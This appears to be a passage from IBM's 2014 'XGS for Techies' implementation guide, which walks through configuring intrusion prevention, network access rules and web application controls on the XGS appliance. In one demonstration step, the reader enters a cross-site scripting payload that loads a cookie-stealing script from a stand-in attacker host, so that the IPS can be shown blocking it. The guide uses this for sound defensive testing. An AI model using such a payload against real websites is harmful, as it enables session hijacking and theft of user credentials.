Security Center of Excellence
Implementation Guide for IBM Security Network
Protection ('XGS for Techies')
Version 1.6
26 September 2014
Tadashi Tsumura
[email protected]
SWAT
IBM Security Systems
Fadly Yahaya
[email protected]
SWAT
IBM Security Systems
Note: Before using this information and the product it supports, read the information in "Notices."
Edition notice
This edition applies to version 5.2 of IBM Security Network Protection and to all subsequent releases and
modifications until otherwise indicated in new editions.
© Copyright International Business Machines Corporation 2014.
Note to U.S. Government Users Restricted Rights -- Use, duplication or disclosure restricted by GSA ADP Schedule
Contract with IBM Corp.
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Credits
A big thanks to the following people for their input:
Vladimir Jeremic, Product Technical Enablement | IBM Security Systems
Luca Bizzotto, SWAT | IBM Security Systems
Giuseppe Marullo, SWAT | IBM Security Systems
Carlos Caballero, SWAT | IBM Security Systems
Hiroo Hishioka, Software developer | IBM Security Systems
Peter Cogill, Software developer | IBM Security Systems
Acknowledgement
A special thanks goes to our manager Giancarlo V. Marchesi for guiding and supporting us in our
work, providing an environment that encourages and stimulates our creativity.
To Pete Stevenson, we wholeheartedly thank you for the trust and patience you gave us, and for
spurring us on to publish this document.
Our deepest gratitude is also due to the staff of the IBM Australia Development Lab for their
kindness in giving us access to the resources in their lab.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
I
Implementation Guide for IBM Security Network Protection
Document Control Information
Version
1.0
Date
23/11/2013
1.1
1.2
1.3
1.4
12/06/2014
13/06/2014
02/07/2014
09/07/2014
1.5
22/07/2014
1.6
08/09/2014
II
XGS for Techies
Person
Fadly Yahaya
Tadashi Tsumura
Tadashi Tsumura
Tadashi Tsumura
Fadly Yahaya
Tadashi Tsumura
Fadly Yahaya
Tadashi Tsumura
Tadashi Tsumura
Fadly Yahaya
Description
Initial Version for XGS 5.1
Edited pictures and fonts
Added XGS 5.2 features
Document review
Document review
Updated for XGS Demo VM and
document review
Version for developerWorks release
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Table of contents
Introduction ..................................................................................................................................................1
Purpose .....................................................................................................................................................2
Required software and hardware ..........................................................................................................3
Before you begin....................................................................................................................................3
Use case scenarios .....................................................................................................................................6
Overview of XGS policies ..........................................................................................................................6
Configuring an Intrusion Prevention Policy for blocking web application attacks .....................................7
Logging in to XGS..................................................................................................................................8
Configuring Protection Interfaces ..........................................................................................................8
Accessing the Intrusion Prevention Policy ..........................................................................................10
Accessing the Default IPS object ........................................................................................................10
Editing the Default IPS object ..............................................................................................................12
Setting the Trust X-Force Default ........................................................................................................13
Enabling the Event Log .......................................................................................................................15
Accessing the Network Access Policy .................................................................................................16
Simulating a Web Application attack ...................................................................................................22
Adding a script to the Sign In page......................................................................................................23
XGS detected and blocked the attack .................................................................................................24
Optional: Event data forwarded to SiteProtector and QRadar ............................................................25
Configuring an Intrusion Prevention Policy for blocking malicious files ..................................................27
Accessing the Intrusion Prevention Policy ..........................................................................................28
Accessing the Default IPS object ........................................................................................................28
Editing the Default IPS object ..............................................................................................................28
Setting the Trust X-Force Default ........................................................................................................29
Enabling the Event Log .......................................................................................................................30
Accessing the Network Access Policy .................................................................................................31
Configuring a Network Access rule .....................................................................................................31
Downloading the malicious file ............................................................................................................32
XGS detected and blocked the malicious file ......................................................................................33
Configuring web applications in a Network Access Policy to control user actions and access to certain
contents on websites ...............................................................................................................................34
Accessing the Network Access Policy .................................................................................................35
Configuring a Network Access rule .....................................................................................................35
Accessing the Web Application ...........................................................................................................41
Viewing Streaming media ....................................................................................................................42
XGS detects and blocks the user from accessing streaming media ...................................................43
Configuring a URL category in a Network Access Policy to control access to certain websites ............44
Accessing the Network Access Policy .................................................................................................45
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
III
Implementation Guide for IBM Security Network Protection
Configuring a Network Access rule .....................................................................................................45
Accessing the social media site ...........................................................................................................49
XGS detects and blocks user from accessing sites listed in the URL Category .................................50
Configuring a domain certificate category in a Network Access Policy to control access to SSL-enabled
websites ...................................................................................................................................................51
Accessing the Network Access Policy .................................................................................................52
Configuring a Network Access rule .....................................................................................................52
Accessing the social media site ...........................................................................................................56
XGS detects and blocks user from accessing sites listed in the Domain Certificate Category ..........57
Configuring non-web applications in a Network Access Policy to block certain applications from
communicating on the network ................................................................................................................58
Accessing the Network Access Policy .................................................................................................59
Configuring a Network Access rule .....................................................................................................59
Installing Skype....................................................................................................................................64
XGS detects and blocks user from connecting to Skype ....................................................................66
Configuring IP reputation to block access to external servers ................................................................67
Accessing the Network Access Policy .................................................................................................68
Configuring a Network Access Policy ..................................................................................................68
XGS detects and blocks user from accessing Anonymous Proxies IP ...............................................72
Optional: Event data forwarded to SiteProtector and QRadar ............................................................75
Configuring Geolocation to block access to external servers .................................................................77
Accessing the Network Access Policy .................................................................................................78
Configuring a Network Access Policy ..................................................................................................78
XGS detects and blocks users from accessing IP addresses hosted in the geolocation....................82
Optional: Event data forwarded to SiteProtector and QRadar ............................................................84
Configuring Local Authentication to control web access based on user identity ....................................86
Creating a user for local authentication ...............................................................................................87
Configuring the IP address for the Protection Interfaces ....................................................................90
Configuring a Network Access Policy rule to authenticate users ........................................................93
Simulating an unauthenticated user accessing a website ...................................................................98
Recommended rule order for enforcing user authentication using the Network Access Policy ........102
Configuring passive authentication with the Active Directory server .....................................................103
Setting up Active Directory Domain Service ......................................................................................104
Creating a Domain user on Active Directory .....................................................................................117
Configuring a Windows client for Active Directory.............................................................................121
Downloading the XGS SSL server certificate ....................................................................................123
Configuring the Logon-event Scanner ...............................................................................................124
Configuring Remote Directory Servers ..............................................................................................134
Configuring Passive Authentication ...................................................................................................137
Configuring a Network Access Policy ................................................................................................138
Simulating Passive Authentication ....................................................................................................144
Troubleshooting issues associated with the Logon-event Scanner ..................................................147
Configuring an Outbound SSL Inspection policy to control access to SSL-enabled websites .............149
Verifying the SSL Inspection license .................................................................................................150
IV
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Configuring the Protection Interface ..................................................................................................151
Configuring an Outbound SSL Inspection policy rule ........................................................................154
Configuring a Network Access Policy rule .........................................................................................160
Downloading the CA certificate from XGS ........................................................................................163
Configuring the client’s Web Browser with the CA certificate from XGS...........................................165
Accessing the SSL-enabled website .................................................................................................173
Configuring an Outbound SSL Inspection policy to block web-based attacks over HTTPS .................174
Configuring SSL Inspection Settings .................................................................................................175
Accessing the Intrusion Prevention Policy ........................................................................................176
Accessing the Default IPS object ......................................................................................................176
Editing the Default IPS object ............................................................................................................177
Setting the Trust X-Force Default ......................................................................................................177
Enabling an Event Log ......................................................................................................................178
Enabling the HTTP_Get audit signature in the Default IPS object ....................................................179
Accessing the Network Access Policy ...............................................................................................180
Configuring a Network Access rule ...................................................................................................180
Simulating an attack over HTTPS .....................................................................................................181
Configuring the Inbound SSL Inspection policy to decrypt inbound HTTPS traffic ...............................183
Preparing the SSL certificate and private key of target servers ........................................................184
Configuring Inbound SSL Certificates ...............................................................................................185
Configuring the Inbound SSL Inspection Policy ................................................................................186
Testing Inbound SSL Inspection ........................................................................................................190
Configuring the IPS Event Filter ............................................................................................................191
Accessing the IPS Event Filter policy ................................................................................................192
Simulating a Web Application attack .................................................................................................198
Adding a script to the feedback entry ................................................................................................199
XGS generates a Security Event with a different Threat Level .........................................................200
Configuring a packet-capture response to log evidence of an attack ...................................................201
Accessing the IPS Event Filter policy ................................................................................................202
Simulating a Web Application attack .................................................................................................204
Adding a script to the feedback entry ................................................................................................205
XGS generates IPS Event and the associated packet capture .........................................................206
Configuring a Quarantine response ......................................................................................................209
Creating an IPS Event Filter policy with a Quarantine object ............................................................210
Simulating a web application attack ..................................................................................................214
Verifying the IPS Event Filter response and quarantine rule ............................................................216
Configuring the IP reputation, IP location, and IDS (monitoring) mode ................................................217
Ensuring that the IP Reputation Database is updated ......................................................................218
Enabling the IP Reputation for events ...............................................................................................219
Configuring the Inspection mode for the Protection Interfaces .........................................................221
Simulating traffic ................................................................................................................................222
XGS detects attack and identifies IP and Location reputation for the event generated ....................223
Configuring QRadar Right-click integration ...........................................................................................224
Configuring a QRadar Advanced Threat Protection agent on XGS ..................................................225
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
V
Implementation Guide for IBM Security Network Protection
Configuring the RightClick module on the QRadar console ..............................................................226
Generating an ISNP alert from the QRadar console .........................................................................227
Verifying the ATP response in XGS ..................................................................................................228
Optional: Deleting the Active Quarantine rule ...................................................................................231
Customizing QRadar Right-click integration ..........................................................................................232
Configuring the QRadar Right-Click option .......................................................................................233
Creating a new quarantine response ................................................................................................235
Generating the custom ISNP alert from QRadar console .................................................................240
Verifying the ATP response in XGS ..................................................................................................241
Configuring Generic ATP agent integration ...........................................................................................243
Configuring a generic ATP agent on XGS .........................................................................................244
Generating an Advanced Threat alert using the curl command ........................................................245
Verifying the ATP response in XGS ..................................................................................................246
Configuring FireEye Web MPS integration ............................................................................................248
Configuring a FireEye ATP agent on XGS ........................................................................................249
Configuring event notifications on the FireEye WebMPS .................................................................250
Mapping FireEye notifications to ATP events ....................................................................................252
Optional: Generating a FireEye event using the FireEye web console .............................................254
Connecting to the FireEye CLI console to send test notification .......................................................255
Testing a Malware Callback event.....................................................................................................256
Testing a Malware Object event notification ......................................................................................260
Testing Web Infection event notification ............................................................................................262
Integrating with SiteProtector ................................................................................................................265
Installing an XGS fix pack ......................................................................................................................271
Creating a PDF file for IPS testing ........................................................................................................275
Preparing a virtual environment for study ..............................................................................................277
Notices ......................................................................................................................................................281
VI
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Introduction
This document details how to configure and showcase the features of the IBM Security Network
Protection (XGS) system for a deployment or a Proof of Concept (PoC). XGS is a
next-generation Intrusion Prevention System (IPS) that provides intrusion prevention and
security awareness and control of application, content, and users.
XGS provides next-generation intrusion prevention functionality for 10 gigabit and 1 gigabit
Ethernet networks. XGS functionality includes botnet command and control protection, malware
protection, Secure Sockets Layer (SSL) man-in-the-middle inspection of encrypted traffic,
firewall protection of web applications, application and application action control, protocol
analysis-based intrusion prevention, URL filtering, Injection Logic Protection, Shell Code
heuristics, and virtual patch.
XGS is designed to:
-
Help stop threats from compromising unpatched vulnerabilities without sacrificing high-speed
network performance.
-
Provide visibility into SSL encrypted traffic.
-
Deliver a flexible licensing model for paying for performance, helping you control costs.
-
Help protect against botnet command and control as well as web-based malware.
-
Deliver a modular XGS to enable easy transition from 1 gigabit networks to 10 gigabit
networks.
-
Decrease hardware support costs by using solid state disk drives and providing a simplified
customer replaceable and field replaceable experience for various hardware components.
-
Help protect networks, servers, desktops, and business critical applications from malicious
threats.
-
Conserve network bandwidth and provide insight into what users are doing on the corporate
network. It helps control user bandwidth consumption by limiting or eliminating access to
non-business critical applications.
-
Help enforce compliance and internal corporate usage of non-business critical applications
such as social networking, peer-to-peer file transfers, instant messaging traffic, and
streaming media.
-
Provide an extensible security platform that can grow as threats evolve, help consolidate
network protection technologies, and help reduce the cost of deploying and managing point
solutions.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
1
Implementation Guide for IBM Security Network Protection
Purpose
The goal of this document is to provide IBM employees with technical details about configuring
XGS and explaining its features and capabilities to customers.
This document contains information that can help with transitioning from GX (IBM Security
Network IPS) to XGS.
This document does not focus on the initial setup and installation of XGS and SiteProtector™.
For the following procedures, please refer to the online product documentation:
Connecting cables and starting XGS
Accessing the local management interface
Using the LCD
Changing passwords
Configuring management interfaces
Configuring host name and DNS information
Configuring protection interfaces
Configuring date and time settings
Installing licenses
Installing updates
System Requirement for SiteProtector
Installing SiteProtector
Reference: IBM Security Network Protection V5.2 documentation
http://www-01.ibm.com/support/knowledgecenter/SSHLHV_5.2.0/com.ibm.alps.doc/alps_collate
ral/alps_dochome_stg.htm
Reference: IBM Security SiteProtector System V3.1.0 documentation
http://www-01.ibm.com/support/knowledgecenter/SSETBF_3.1.0/com.ibm.siteprotector.doc/sp_
collateral/sp_dochome_stg.htm
2
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Required software and hardware
This section focuses on the require software and hardware for the deployment and PoC.
IBM Security Network Security Protection: XGS protects business-critical network infrastructure
through a unique combination of threat protection, visibility, and control. IBM extends the abilities
of traditional intrusion prevention systems by offering a next-generation solution that provides
network security professionals with complete security, visibility, and control over their network.
By combining several advanced capabilities, this solution can help prevent threats, provide
critical insight into network activities, and enable granular application control, helping to establish
a new level of integrated, simplified security.
IBM Security SiteProtector System: SiteProtector is a centralized management system that
unifies management and analysis for network, server, and endpoint security agents, including
XGS. It reduces the cost and complexity of security management, helps you monitor and
measure your exposure to vulnerabilities, and demonstrates regulatory compliance. The IBM
Security SiteProtector system can help minimize your overall risk and increase the efficacy of
your security team, while optimizing cost efficiency.
Before you begin
Ensure that you have at least the following licenses and that they have not expired.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
3
Implementation Guide for IBM Security Network Protection
These licenses ensure that you are able to update XGS and
SiteProtector with the latest updates and firmware. The licenses also entitle you to
request IBM Support for help should a technical issue arise.
Important:
4
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
The following example shows 30-day licenses for all features, functionality, and updates for the
XGS virtual appliance for Demo.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
5
Implementation Guide for IBM Security Network Protection
Use case scenarios
Overview of XGS policies
The Network Access Policy (NAP), the Outbound SSL Inspection policy, the Inbound SSL
Inspection policy, the Intrusion Prevention Policy (IPP), and the IPS Event Filter policy
relate to one another at a basic level. The NAP controls the traffic flow, the Outbound SSL
Inspection policy and Inbound SSL Inspection policy enforce rules that specify which traffic is
decrypted for inspection, the IPP analyzes the traffic, and the IPS Event Filter policy creates
exceptions to the analysis.
A network packet assumes the following path as it passes through XGS.
1. Protection Interface
2. Network Access Policy
3. Outbound/Inbound SSL Inspection Policy if traffic is encrypted
4. SSL Inspection Settings if outbound traffic is decrypted
5. IPS Event Filter Policy
6. Intrusion Prevention Policy
While the above list describes the basic packet flow through the device, you must understand
that verifying the Network Access Policy rule is not a one-time event. In some cases, XGS has to
defer detection for things such as "Application" if the flow is encrypted. In such cases, the traffic
is inspected after it is decrypted.
Example: If a rule is present to block Twitter and the user is accessing Twitter via HTTPS, it will
not be blocked until after XGS has decrypted the stream (assuming Outbound SSL Inspection is
configured). Only then is Network Access Policy rule processing complete. So in this example,
the traffic flow became [Network Access Policy] > [Outbound SSL inspection] > [SSL Inspection
Settings] > [Network Access Policy] prior to the final block.
Reference: http://www-01.ibm.com/support/docview.wss?uid=swg21667625
6
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Configuring an Intrusion Prevention Policy for
blocking web application attacks
This use case describes how to configure the Intrusion Prevention Policy to block web
application attacks. In this example, XGS blocks an attack when an end user attempts to inject a
malicious script in to the vulnerable web application.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
7
Implementation Guide for IBM Security Network Protection
Logging in to XGS
XGS offers a browser-based graphical user interface for local, single XGS management.
Launch a web browser to log in to the local management interface (LMI) of XGS.
To log in to the local management interface, type the IP address or host name of XGS in the web
browser.
Configuring Protection Interfaces
Use the Protection Interfaces page to configure the Protection Mode and the Speed and
Duplex mode for each interface. To navigate to Protection Interfaces, click the Manage System
Settings link from the main menu, and then click Protection Interfaces under Network
Settings.
8
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Select the Protection Interface check box and click Edit.
For Inspection Mode, select Protection. Click Save Configuration. Click Deploy.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
9
Implementation Guide for IBM Security Network Protection
Accessing the Intrusion Prevention Policy
To navigate to the Intrusion Prevention Policy, click the Secure Policy Configuration link from
the main menu, and then click Intrusion Prevention Policy under the Security Policies.
Accessing the Default IPS object
Expand the left panel.
Select the Default IPS object.
10
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
The Default IPS object contains the security events recommended by IBM
X-Force configured with specific settings and responses to protect against a wide
range of threats. This is an example of how easy it is to use the feature.
Note:
The User Overridden attribute of a security event indicates whether it has been
modified from the original X-Force configuration. If a security event in the Default IPS
object is User Overridden, XGS does not apply the settings and responses that
X-Force prescribes for the event. The modified security event acts as configured by
its overridden settings.
Tip: You can use the filter
button to search for specific signatures of interest,
based on the column information such as Event Name.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
11
Implementation Guide for IBM Security Network Protection
Tip: Configure IPS objects from the Network Access Policy as a convenience.
Editing the Default IPS object
Right-click the Default IPS object and select Edit.
12
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Setting the Trust X-Force Default
Make the following changes on the General Configuration tab of the Edit IPS Object window:
1. For Name, enter Default IPS.
2. For Comment, enter X-Force Recommended IPS Policy.
3. For Enable X-Force Level Signatures, select Aggressive.
4. Select the Enable X-Force Protection Level Blocking check box.
5. For Content Update Trust Level, select Current.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
13
Implementation Guide for IBM Security Network Protection
To simplify the deployment of XGS in real-life environments, IBM X-Force
specifies the four protection levels of default signatures and recommended responses,
such as block, in each X-Press Update (XPU).
Note:
14
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Enabling the Event Log
Add the Event Log object to Added Objects. Click Save Configuration and Click Deploy.
The Event Log object adds a record to the Event Log file when a policy rule is triggered or when
a system event occurs. In this instance, when an Intrusion Policy rule (i.e. HTTP_POST_Script)
is triggered, an event will be generated.
If an Event Log object is added to a Network Access Policy rule, XGS generates an event for
any packet that matches the rule.
You can also use the packet capture objects to record packet capture when
an IPS Event Filter policy rule or an Intrusion Prevention policy rule is triggered.
Packet capture objects have been available as responses in a network access policy
since firmware version 5.2.
Note:
Capture Packet - XGS captures only the offending packet. When you use a capture
packet object, XGS produces a capture file for only the first event in a flow. If you
want XGS to capture all the offending packets, use a capture connection object.
Capture Connection - XGS captures all packets in the connection, starting with the
offending packet. XGS captures packets until the connection ends or until the
configurable limit is reached.
Tip: You can apply only one packet capture object to a rule.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
15
Implementation Guide for IBM Security Network Protection
Accessing the Network Access Policy
To navigate to the Network Access Policy, click the Secure Policy Configuration link from the
main menu, and then click Network Access Policy under the Security Policies.
The Network Access Policy allows XGS to analyze network traffic based on
the following six attributes of each packet flow, allowing precise specification of
access control and security policy:
- source address
- source port
- destination address
- destination port
- transport protocol
- application protocol
Note:
In XGS, a network packet is processed by the first rule it matches. That is, if a packet encounters
a rule that matches it, the packet never gets to a later rule. In the following example, once a
packet matches Rule 3, it will not be evaluated by Rule 4.
16
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Add/Edit a rule so that at least one rule uses the Default IPS object for inspecting network
packets for attacks. Enable the rule, set the Source to Any, set the Destination to Any, set the
Action to Accept. Click Save Configuration and click Deploy.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
17
Implementation Guide for IBM Security Network Protection
Tip: Place specific rules before general ones because rules are applied in the order
they are listed in on the Network Access Policy page.
Before you create a Network Access rule, define the Network Objects to use in the
rule.
After you create or edit your Network Access Policy, you must deploy the rules before
the changes will take effect.
Long, complicated, and overlapping rule sets take longer to process than simple,
shorter ones.
To optimize processing time, avoid rule sets that contain the following elements:
- many overlapping groups of host addresses
- many individual users
- many large groups of users
Consider adding a "match anything" rule at the end. The system applies the Default
IPS policy to unmatched packets.
18
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Tip: The Network Access rule allows you to control traffic flow between hosts,
segments, or the entire subnet. It works like Firewall rules.
You can configure the Source tab in a Network Access rule with the IP address, IP
address range, Subnet, List of Addresses, Geolocation, VLAN IDs, Adapters (NIC) on
XGS, or users and groups of user. You can choose users from the local user
database or remote directory (LDAP / Active Directory) servers. Both IPv4 and IPv6
formats are supported. To specify a group of hosts by their virtual LAN (VLAN) ID,
select the VLAN ID tab, and then type one or more VLAN IDs. To specify a group of
hosts by the physical interface they are connected to, select the Adapters tab, and
then select the interface.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
19
Implementation Guide for IBM Security Network Protection
The Destination tab in a Network Access Policy can be configured only with the IP
address, IP address range, Subnet, List of Addresses, Geolocation, VLAN IDs and
Adapters (NIC) on XGS.
You can configure the Application tab in the Network Access rule with source ports
and destination ports by defining a Non-web Application object.
20
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Tip: Based on the above attributes (Source, Destination, Application, Inspection), the
Network Access Policy allows for Protection Domains and Connection Events to
be configured in XGS.
Protection Domains and Connection Events are features available in the GX.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
21
Implementation Guide for IBM Security Network Protection
Simulating a Web Application attack
Launch a browser and access the vulnerable web server hosted by IBM. Click the Sign In link.
22
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Adding a script to the Sign In page
For Username, enter <script src=”http://hackerx.org/stealcookie.js”></script>. For
Password, enter any string. Click Login.
XGS blocks the access.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
23
Implementation Guide for IBM Security Network Protection
XGS detected and blocked the attack
To navigate to the IPS Events, click the Monitor Analysis and Diagnostics link from the main
menu and then click Event Log. Select the IPS Events tab.
XGS has generated an event for the associated attack.
24
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Optional: Event data forwarded to SiteProtector and QRadar
XGS sends the following event to SiteProtector when it is managed by SiteProtector.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
25
Implementation Guide for IBM Security Network Protection
XGS sends the following remote syslog event to the QRadar Console when the Remote Event
Log object is configured as a response in the Network Access Policy rule.
26
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Configuring an Intrusion Prevention Policy for
blocking malicious files
This use case describes how to configure the Intrusion Prevention Policy to block file-based
attacks. In this example, XGS blocks a malicious file when an end user attempts to download it
from a web server.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
27
Implementation Guide for IBM Security Network Protection
Accessing the Intrusion Prevention Policy
Launch a web browser to log on to the XGS LMI. To navigate to the Intrusion Prevention Policy,
click the Secure Policy Configuration link from the main menu and then click Intrusion
Prevention Policy under the Security Policies.
Accessing the Default IPS object
Expand the left panel. Select the Default IPS object.
Editing the Default IPS object
Right-click the Default IPS object and select Edit.
28
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Setting the Trust X-Force Default
Make the following changes on the General Configuration tab of the Edit IPS Object window:
1. For Name, enter Default IPS.
2. For Comment, enter X-Force Recommended IPS Policy.
3. For Enable X-Force Level Signatures, select Aggressive.
4. Select the Enable X-Force Protection Level Blocking check box.
5. For Content Update Trust Level, select Current.
To simplify the deployment of XGS in real-life environments, IBM X-Force
specifies the default signatures and recommended responses in each X-Press
Update (XPU).
Note:
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
29
Implementation Guide for IBM Security Network Protection
Enabling the Event Log
Add the Event Log object to Added Objects. Click Save Configuration and Deploy.
30
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Accessing the Network Access Policy
To navigate to the Network Access Policy, click the Secure Policy Configuration link from the
main menu and then click Network Access Policy under the Security Policies.
Configuring a Network Access rule
Add/Edit a rule so that at least one rule uses the Default IPS object for inspecting network
packets for attacks. Enable the rule, set the Source to Any, set the Destination to Any, and set
the Action to Accept. Click Save Configuration and Deploy.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
31
Implementation Guide for IBM Security Network Protection
Downloading the malicious file
Launch a browser and download a file from the vulnerable web server:
http://192.168.5.111/xgs4techies.pdf.
Note:
32
See
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Creating a PDF file for IPS testing to prepare the PDF file for testing.
XGS blocks the access and the download failed.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
33
Implementation Guide for IBM Security Network Protection
XGS detected and blocked the malicious file
To navigate to the IPS Events, click the Monitor Analysis and Diagnostics link from the main
menu and then click Event Log. Select the IPS Events tab. XGS has generated events for the
associated attack.
34
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Configuring web applications in a Network
Access Policy to control user actions and access
to certain contents on websites
This use case describes how to configure the Network Access Policy to control a user’s access
to a web application and the actions that are permitted, such as uploading files, posting
comments, or viewing movie clips. In this example, XGS allows a user access to a news site but
prevents the user from accessing streaming media.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
35
Implementation Guide for IBM Security Network Protection
Accessing the Network Access Policy
Launch a web browser to log on to the XGS LMI. To navigate to the Network Access Policy, click
the Secure Policy Configuration link from the main menu and then click Network Access
Policy under the Security Policies.
Configuring a Network Access rule
Click the New button to open the Add Network Access Rule window. On the General
Configuration tab, enter 1 in the Order field. Select the Enable check box. Set the Action to
Reject.
By default, a new rule is placed in the list below the rule you previously
selected. If no rule is selected, the new rule is placed at the end of the rule list.
Note:
36
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
On the Response tab, add the Event Log object to Added Objects.
On the Source tab, add Any to Added Objects and leave the others in Available Objects. On the
Destination tab, add Any to Added Objects and leave the others in Available Objects.
On the Application tab, Click New and select Web Application.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
37
Implementation Guide for IBM Security Network Protection
Use Web Application objects to control access to categorized types of
web-based applications and to control how people use them on your network. The
Network Protection database provides an indexed list of Web Application categories
that you can block or limit access to on your network. These categories include web
mail, social networking, and gaming sites.
Note:
In addition to blocking or limiting these site categories, you can prohibit users from
performing specific actions on many of these sites. In this example, you can allow
users to view social media sites such as YouTube or Flickr, but not allow users to post
to them. Or you can allow users to view and to post to networking sites, such as
Facebook or Myspace, but not to upload photos or to play games.
In the Add Web Application window, specify the Name on the General Configuration tab.
38
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
On the Web Applications tab, click the Filter
parameters:
Match: all rules
Column: Category
Condition: contains
Value: news
© Copyright IBM Corp. 2014
button and create a filter using the following
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
39
Implementation Guide for IBM Security Network Protection
The Filter returns a list of Web Applications with news content and the associated Actions. Add
cnn.com – Stream/Download to the Added Web Application Actions list. Click Save
Configuration.
40
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
On the Application tab, add the newly created Web Application object to Added Objects.
On the Inspection tab, add the Default IPS object to Added Objects. On the Schedule tab,
leave Added Objects empty. Click Save Configuration and Deploy.
The new Network Access rule is deployed.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
41
Implementation Guide for IBM Security Network Protection
Accessing the Web Application
Launch a browser and navigate to http://www.cnn.com.
Your browser is redirected to a new site.
42
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Viewing Streaming media
Scroll down to the streaming media content and click a video to view it.
XGS blocks the access.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
43
Implementation Guide for IBM Security Network Protection
